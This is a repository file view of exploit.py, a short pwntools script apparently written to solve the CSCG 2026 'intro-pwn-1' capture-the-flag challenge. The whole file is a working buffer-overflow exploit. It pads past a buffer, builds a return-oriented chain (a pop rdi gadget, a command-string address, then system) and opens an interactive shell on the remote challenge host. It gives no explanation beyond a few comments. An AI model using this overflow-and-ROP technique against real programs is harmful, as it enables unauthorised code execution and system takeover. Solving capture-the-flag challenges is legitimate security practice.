Files
ctf/2026/cscg/pwn/intro-pwn-1/exploit.py
2026-03-09 21:44:25 +01:00

35 lines
807 B
Python

from pwn import *
# Set the context for the binary
context.binary = './intro-pwn' # Replace with your binary's name
# Choose local or remote
LOCAL = False # Change to False if connecting remotely
if LOCAL:
p = process(context.binary.path)
else:
p = remote("p2pq5hljmidnzi2fm2txsbl4b5-1024-intro-pwn-1.challenge.cscg.live", 443, ssl=True)# Define functions for convenience
def send_payload(payload):
p.sendline(payload)
def recv_until(delim):
return p.recvuntil(delim)
def interact():
p.interactive()
address = 0x4011c7
system = 0x4011d5
pop_rdi = 0x401205
command_addr = 0x402010
# Example interaction
recv_until(b'What is your name?')
payload = b'A' * 16 + b'\x00' * 8 + p64(pop_rdi) + p64(command_addr) + p64(system)
send_payload(payload)
interact() # Keep the shell open